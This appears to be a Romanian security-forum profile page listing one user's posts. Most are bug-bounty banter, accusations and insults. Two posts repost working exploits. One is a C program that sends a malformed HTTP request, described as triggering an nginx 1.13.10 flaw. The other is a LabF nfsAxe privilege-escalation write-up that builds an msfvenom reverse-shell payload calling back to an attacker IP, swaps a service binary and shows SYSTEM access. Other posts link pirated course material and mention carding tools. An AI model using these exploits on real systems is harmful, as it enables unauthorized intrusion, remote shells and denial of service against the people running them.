Jump to content

KRONZY.

Members
  • Content Count

    40
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by KRONZY.

  1. KRONZY.

    RST Bashed

    Din comportamentul și contentul tau imi dau seama ce fel de om esti, am pus poza aia doar prin simplu fapt ca mii sa părut amuzant că ai pus copyright la așa ceva. Îl jignești pe "aismen" doar că pentru face aplicații free pe un forum? Cu ce a greșit sau ce probleme a făcut că ajută lumea cu ceva free? De ce nu o faci și tu ? Ești penibil, jur.
  2. KRONZY.

    RST Bashed

    @Nytro, ai fanii
  3. KRONZY.

    [XSS] facebook

    Da, parametrul vulnerabil e alert('xss') in consola De ce ai dat in jos sa nu se vada form-ul de search? penibil... Frumos la bookmark's "CC generator", esti bun @aramen @Nytro In caz ca sterge poza : http://prntscr.com/je217y Out cu carder-ul asta. @Zekor si eu am redtube la bookmarks de mult, n am nici o treaba cu ei, jur...
  4. KRONZY.

    [XSS] facebook

    Hai ca nu e fake!
  5. KRONZY.

    [XSS] ZippyShare

    De cand are zippyshare program de bug bounty? Citeste descrierea categoriei inainte sa mai postezi atatea shit-uri.
  6. KRONZY.

    ISJPH SQLi

    1. Nu ma intereseaza. 2. Puteai sa scoti versiunea si manual. 3. Crezi ca ei nu au loguri ? Sau asa de batut in cap esti ? Nu mai scrie pe numere, ca nu esti interesant ! Ce altceva pot sa zic, ai umplut tot index-ul cu 3 post-uri de cacat, Bravo!
  7. KRONZY.

    ISJPH SQLi

    Nu cred ca ISJ au program de Bug Bounty. + tu le raportezi vuln, dupa ce ai intrat cu Havij/Sqli Dumper in DB?
  8. KRONZY.

    G2A SQLi

    Unde este dovada ca ai gasit SQLI in G2A? Ne arati un raspuns la ticket automat, si cum trimiti tu un mail. Dovada ca a fost fixat de atat timp? O poza, un VPoC?
  9. https://www.bestvpn.com/roll-openvpn-server-vps-using-centos-6/ "how to make a VPN server on a VPS" - google it
  10. raportat.
  11. Ba ce pula mea intrati zi de zi pe profilu meu si tu si @aramen si @prietenfals v-ati facut abonament?

    Va platesc part-time cu bonuri sa stati pe RST, si sa luati toate profilurile la rand??

  12. @Aerosol Vezi si tu pe hackerone,bugcrowd ce bounty-uri se dau si iti dai seama daca poti traii din bug bounty.
  13. Daca ai site baga Cloudfare, cel putin nu o sa te mai pice orcine, decat daca stie IP-ul din spate. Daca te referii la net-ul tau, suna la Provider si spunele sa iti da un change ip.
  14. KRONZY.

    RST Bashed

    http://www.zone-h.org/mirror/id/24590218 :)))))))))))))))))))))))))))))))))))))))))))))))))))))
  15. https://erpscan.com/press-center/blog/oracle-ebs-penetration-testing-tool/
  16. // Underground_Agency (UA) - (koa, bacL, g3kko, Dostoyevsky) // trigger nginx 1.13.10 (latest) logic flaw / bug // ~2018 // Tested on Ubuntu 17.10 x86 4.13.0-21-generic #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <time.h> int main(int argc, char **argv){ int sockfd, ret; sockfd = socket(AF_INET, SOCK_STREAM, 0); if(sockfd < 0){ perror("socket"); exit(EXIT_FAILURE); } struct sockaddr_in servAddr; memset(&servAddr, 0, sizeof(servAddr)); servAddr.sin_family = AF_INET; servAddr.sin_port = htons(atoi(argv[2])); servAddr.sin_addr.s_addr = inet_addr(argv[1]); ret = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(servAddr)); if(ret < 0){ perror("connect"); exit(EXIT_FAILURE); } char buf[2048]; strcpy(buf, "GET / HTTP/1.1\r\nHost: "); strcat(buf, argv[1]); strcat(buf, "\r\n"); strcat(buf, "Connection: close\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\r\n"); char *buf2 = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n" "Accept-Encoding: gzip, deflate\r\n\rrrrr\r\r\r\r\\rr\rrrrrr" // bug "Accept-Language: en-US,en;q=0.9\r\n\r\n"; strcat(buf, buf2); char recvbuf[1024]; ret = send(sockfd, buf, strlen(buf), 0); if(ret < 0){ perror("send"); exit(EXIT_FAILURE); } printf("Successfully sent data\n"); ret = recv(sockfd, recvbuf, 1024, 0); if(ret < 0){ perror("recv"); exit(EXIT_FAILURE); } printf("Data: %s\n", recvbuf); close(sockfd); exit(EXIT_SUCCESS); }
  17. KRONZY.

    Udemy

    https://tor-cr.com/A9B63537EB12F5E4F7FEEAA2348844F8FA0EDE5B
  18. L am raportat pe Bugcrowd, au program de bug bounty. https://bugcrowd.com/ciscomeraki Nu conteaza ca n am editat cookie urile
  19. Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: LabF nfsAxe 3.7 - Privilege Escalation Date: 03-24-2018 Vulnerable Software: LabF nfsAxe 3.7 Vendor Homepage: http://www.labf.com/ Version: 3.7 Software Link: http://www.labf.com/download/nfsaxe.exe Tested On: Windows 7 x86 and x64 *Requires Windows 7 Public Sharing to be enabled Details: By default LabF nfsAxe 3.7 installs to "C:\Users\Public\Program Files\LabF.com\nfsAxe" and installs a service called "XwpXSetSrvnfsAxe service". To start this service an executable "xsetsrv.exe" is located in the same directory and also runs under Local System. By default in Windows with Public Folder sharing enabled, the permissions on any file/folder under "C:\Users\Public\" is Full Control for Everyone. This means unprivileged users have the ability to add, delete, or modify any and all files/folders. Exploit: 1. Generate malicious .exe on attacking machine msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -f exe > /var/www/html/xsetsrv.exe 2. Setup listener and start apache on attacking machine nc -nlvvp 443 service apache2 start 3. Download malicious .exe on victim machine Open browser to http://192.168.0.149/xsetsrv.exe and download 4. Rename C:\Users\Public\Program Files\LabF.com\nfsAxe\xsetsrv.exe xsetsrv.exe > xsetsrv.bak 5. Copy/Move downloaded xsetsrv.exe file to C:\Users\Public\Program Files\LabF.com\nfsAxe\ 6. Restart victim machine and login as unprivileged user 7. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system Prerequisites: To successfully exploit this vulnerability, an attacker must already have access to a system running a LabF nfsAxe installed at the default location using a low-privileged user account Risk: The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System aka Game Over. Fix: Don't use default install path
  20. KRONZY.

    ..

    Ai pus un text, de unde sa stim noi ca e adevarat? Un VPoC? O poza?
  21. KRONZY.

    Salutare RST

    Aerosol: eu sunt pentester, prietene... welcome
×
×
  • Create New...